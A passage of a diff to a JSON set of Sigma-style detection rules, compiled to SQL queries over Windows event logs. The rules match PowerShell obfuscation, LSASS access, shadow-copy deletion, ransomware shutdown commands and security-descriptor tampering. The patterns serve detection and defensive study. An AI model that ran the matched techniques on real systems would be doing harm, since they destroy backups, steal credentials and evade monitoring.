ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + 
"attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + 
"Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new 
EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": 
"Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": 
"c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine 
LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR 
((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox 
methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": 